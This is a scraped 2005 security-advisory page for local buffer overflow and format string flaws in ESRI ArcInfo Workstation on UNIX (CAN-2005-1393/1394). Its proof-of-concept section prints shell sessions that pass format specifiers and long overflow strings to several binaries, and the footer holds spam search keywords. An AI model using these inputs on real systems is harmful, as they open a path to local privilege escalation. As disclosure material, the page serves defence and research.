exploits , vulnerabilities , articles , ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
| Title |
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities |
| Published |
2005-04-30-12:00AM |
| Updated |
2005-05-24-02:45PM |
| Class |
Unknown |
| CVE |
CAN-2005-1393 CAN-2005-1394 |
| Remote |
No |
| Local |
Yes |
| Credit |
Discovery is credited to Kevin Finisterre. |
| Vulnerable |
ESRI ArcInfo Workstation on UNIX 9.0
ESRI ArcInfo Workstation on UNIX 8.3 |
| Not Vulnerable |
|
| Code |
The following proof-of-concept examples were provided:
-bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x -bash-2.05b$ ./wservice Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run! -bash-2.05b# export ARCHOME=%x.%x.%x.%x -bash-2.05b# ./lockmgr Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run! -bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b FATAL ERROR Segment Violation -bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a FATAL ERROR Segment Violation -bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'` FATAL ERROR Segment Violation -bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'` FATAL ERROR Segment Violation -bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a FATAL ERROR Segment Violation
Exploit code was also released for the 'wservice' format string vulnrability.
/data/vulnerabilities/exploits/ex_arcgis.c
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 08:38:50 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.od88.c Pic archiv lavalif VIDIO SEX WWW.it22.c www.5151c. moovi Freeanimal www.mxdy.c sex hot gi age 18 shakillase www,doodhw sexindiaco www.wzcxw. how to cra news for c maxcpm.inf cordaserve qdyhjxzz.c maxcpm.inf bejbi www.mtnlmu Www.freenu muma123.co powered by pure ftps aljins bngb www.thamil t797t WWW.WOLD.S Free porn Www.songwo maxcpm.inf results f 200 /compo /xpl/explo www.wzlwgg gemes.com Www.Video. milka Cari anima www.jujiam microsoft mambo.php openssh 1 www.xuepao www.jockey WWW.WOLD.S
|